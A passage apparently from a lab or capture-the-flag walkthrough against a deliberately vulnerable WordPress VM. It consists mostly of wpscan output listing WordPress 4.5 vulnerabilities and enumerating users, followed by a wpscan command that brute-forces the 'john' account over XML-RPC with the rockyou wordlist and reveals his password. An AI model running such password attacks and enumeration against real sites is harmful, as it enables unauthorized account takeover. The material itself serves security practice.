| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9171
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9172
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9173
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
|
| [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9174
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9175
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a

[+] WordPress theme in use: twentysixteen
| Location: http://192.168.10.3/backup_wordpress/wp-content/themes/twentysixteen/
| Last Updated: 2019-01-09T00:00:00.000Z
| Readme: http://192.168.10.3/backup_wordpress/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 1.8
| Style URL: http://192.168.10.3/backup_wordpress/wp-content/themes/twentysixteen/style.css?ver=4.5
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.10.3/backup_wordpress/wp-content/themes/twentysixteen/style.css?ver=4.5, Match: 'Version: 1.2'

[+] Enumerating Users
Brute Forcing Author IDs - Time: 00:00:03 <=============================================================================================================> (10 / 10) 100.00% Time: 00:00:03

[i] User(s) Identified:

[+] john
| Detected By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] admin
| Detected By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] Finished: Tue Feb 19 10:43:13 2019
[+] Requests Done: 20
[+] Cached Requests: 34
[+] Data Sent: 4.306 KB
[+] Data Received: 36.182 KB
[+] Memory used: 9.75 MB
[+] Elapsed time: 00:00:08

Early today when I went through the VM for the first time, I was really surprised to see such a long list and yet have nothing I could use to break into the machine, so I decided run wpscan one more time and try to crack the john account.

root@kali:~# wpscan --url 192.168.10.3/backup_wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames "john"
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.4.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.10.4/backup_wordpress/
[+] Started: Sun Feb 10 14:30:12 2019

Interesting Finding(s):

[+] http://192.168.10.4/backup_wordpress/
| Interesting Entries:
| - Server: Apache/2.2.22 (Ubuntu)
| - X-Powered-By: PHP/5.3.10-1ubuntu3.26
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.10.4/backup_wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.10.4/backup_wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] WordPress version 4.5 identified (Insecure, released on 2016-04-12).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.10.4/backup_wordpress/?feed=rss2, <generator>https://wordpress.org/?v=4.5</generator>
| - http://192.168.10.4/backup_wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.5</generator>
|
| [!] 51 vulnerabilities identified:
|
| [!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
| Fixed in: 4.5.2
| References:
| - https://wpvulndb.com/vulnerabilities/8488
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
| - https://wordpress.org/news/2016/05/wordpress-4-5-2/
| - https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
| - https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
|
| [!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
| Fixed in: 4.5.2
| References:
| - https://wpvulndb.com/vulnerabilities/8489
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
| - https://wordpress.org/news/2016/05/wordpress-4-5-2/
| - https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
| - https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
|
| [!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
| Fixed in: 4.5.3
| References:
| - https://wpvulndb.com/vulnerabilities/8518
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
| - https://wordpress.org/news/2016/06/wordpress-4-5-3/
| - https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
|
| [!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
| Fixed in: 4.5.3
| References:
| - https://wpvulndb.com/vulnerabilities/8519
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
| - https://wordpress.org/news/2016/06/wordpress-4-5-3/
| - https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
| - https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
|
| [!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
| Fixed in: 4.5.3
| References:
| - https://wpvulndb.com/vulnerabilities/8520
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
| - https://wordpress.org/news/2016/06/wordpress-4-5-3/
| - https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
|
| [!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
| Fixed in: 4.5.4
| References:
| - https://wpvulndb.com/vulnerabilities/8615
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
| - https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
| - https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
| - http://seclists.org/fulldisclosure/2016/Sep/6
|
| [!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
| Fixed in: 4.5.4
| References:
| - https://wpvulndb.com/vulnerabilities/8616
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
| - https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
|
| [!] Title: WordPress 4.3-4.7 - Remote Code Execution (RCE) in PHPMailer
| Fixed in: 4.7.1
| References:
| - https://wpvulndb.com/vulnerabilities/8714
| - https://www.wordfence.com/blog/2016/12/phpmailer-vulnerability/
| - https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/24767c76d359231642b0ab48437b64e8c6c7f491
| - http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_phpmailer_host_header
|
| [!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8716
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
| - https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
|
| [!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8718
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
| - https://www.mehmetince.net/low-severity-wordpress/
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
|
| [!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8719
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
| - https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
|
| [!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8720
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
| - https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
|
| [!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
| Fixed in: 4.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8721
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
| - https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
| - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
|
| [!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
| Fixed in: 4.5.6
| References:
| - https://wpvulndb.com/vulnerabilities/8729
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
| - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
| - https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
|
| [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
| Fixed in: 4.5.6
| References:
| - https://wpvulndb.com/vulnerabilities/8730
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
| - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
| - https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
|
| [!] Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table
| Fixed in: 4.5.6
| References:
| - https://wpvulndb.com/vulnerabilities/8731
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5612
| - https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
| - https://github.com/WordPress/WordPress/commit/4482f9207027de8f36630737ae085110896ea849
|
| [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
| Fixed in: 4.5.7
| References:
| - https://wpvulndb.com/vulnerabilities/8765
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
| - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
| - https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
| - http://seclists.org/oss-sec/2017/q1/563
|
| [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
| Fixed in: 4.5.7
| References:
| - https://wpvulndb.com/vulnerabilities/8766
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
| - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
|
| [!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
| Fixed in: 4.5.7
| References:
| - https://wpvulndb.com/vulnerabilities/8768
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
| - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
| - https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
|
| [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
| Fixed in: 4.5.7
| References:
| - https://wpvulndb.com/vulnerabilities/8770
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
| - https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
| - https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
| - http://seclists.org/oss-sec/2017/q1/562
| - https://hackerone.com/reports/153093
|
| [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
| References:
| - https://wpvulndb.com/vulnerabilities/8807
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
| - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
| - http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
| - https://core.trac.wordpress.org/ticket/25239
|
| [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8815
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
| - https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
|
| [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8816
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
|
| [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8817
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
|
| [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8818
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
| - https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
|
| [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8819
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
| - https://hackerone.com/reports/203515
| - https://hackerone.com/reports/203515
|
| [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
| Fixed in: 4.5.9
| References:
| - https://wpvulndb.com/vulnerabilities/8820
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
| - https://wordpress.org/news/2017/05/wordpress-4-7-5/
| - https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
|
| [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8905
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
| - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
|
| [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
| Fixed in: 4.7.5
| References:
| - https://wpvulndb.com/vulnerabilities/8906
| - https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
| - https://wpvulndb.com/vulnerabilities/8905
|
| [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8910
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41398
|
| [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8911
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41457
|
| [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8913
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41448
|
| [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
| Fixed in: 4.5.10
| References:
| - https://wpvulndb.com/vulnerabilities/8914
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41395
| - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
|
| [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
| Fixed in: 4.5.11
| References:
| - https://wpvulndb.com/vulnerabilities/8941
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
| - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
| - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
| - https://twitter.com/ircmaxell/status/923662170092638208
| - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
|
| [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
| Fixed in: 4.5.12
| References:
| - https://wpvulndb.com/vulnerabilities/8966
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
|
| [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
| Fixed in: 4.5.12
| References:
| - https://wpvulndb.com/vulnerabilities/8967
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
|
| [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
| Fixed in: 4.5.12
| References:
| - https://wpvulndb.com/vulnerabilities/8968
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
|
| [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
| Fixed in: 4.5.12
| References:
| - https://wpvulndb.com/vulnerabilities/8969
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
|
| [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
| Fixed in: 4.5.13
| References:
| - https://wpvulndb.com/vulnerabilities/9006
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
| - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
| - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/ticket/42720
|
| [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
| References:
| - https://wpvulndb.com/vulnerabilities/9021
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
| - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
| - https://github.com/quitten/doser.py
| - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
|
| [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
| Fixed in: 4.5.14
| References:
| - https://wpvulndb.com/vulnerabilities/9053
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
|
| [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
| Fixed in: 4.5.14
| References:
| - https://wpvulndb.com/vulnerabilities/9054
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
|
| [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
| Fixed in: 4.5.14
| References:
| - https://wpvulndb.com/vulnerabilities/9055
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
|
| [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
| Fixed in: 4.5.15
| References:
| - https://wpvulndb.com/vulnerabilities/9100
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
| - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
| - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
| - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
| - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
| - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
|
| [!] Title: WordPress <= 5.0 - Authenticated File Delete
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9169
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9170
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
|
| [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9171
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9172
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9173
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
|
| [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9174
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9175
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a

[+] WordPress theme in use: twentysixteen
| Location: http://192.168.10.4/backup_wordpress/wp-content/themes/twentysixteen/
| Last Updated: 2019-01-09T00:00:00.000Z
| Readme: http://192.168.10.4/backup_wordpress/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 1.8
| Style URL: http://192.168.10.4/backup_wordpress/wp-content/themes/twentysixteen/style.css?ver=4.5
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.10.4/backup_wordpress/wp-content/themes/twentysixteen/style.css?ver=4.5, Match: 'Version: 1.2'

[+] Enumerating All Plugins

[i] No plugins Found.

[+] Enumerating Config Backups
Checking Config Backups - Time: 00:00:00 <==============================================================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
Error: Request timed out.
Error: Request timed out.
Error: Request timed out.
Error: Request timed out.
Error: Request timed out.
[SUCCESS] - john / enigma
Trying john / paulo Time: 00:20:55 <=================================================================================================================> (2515 / 2515) 100.00% Time: 00:20:55

[i] Valid Combinations Found:
| Username: john, Password: enigma

[+] Finished: Sun Feb 10 14:52:16 2019
[+] Requests Done: 2567
[+] Cached Requests: 4
[+] Data Sent: 1.181 MB
[+] Data Received: 1.765 MB
[+] Memory used: 956.066 MB
[+] Elapsed time: 00:22:04

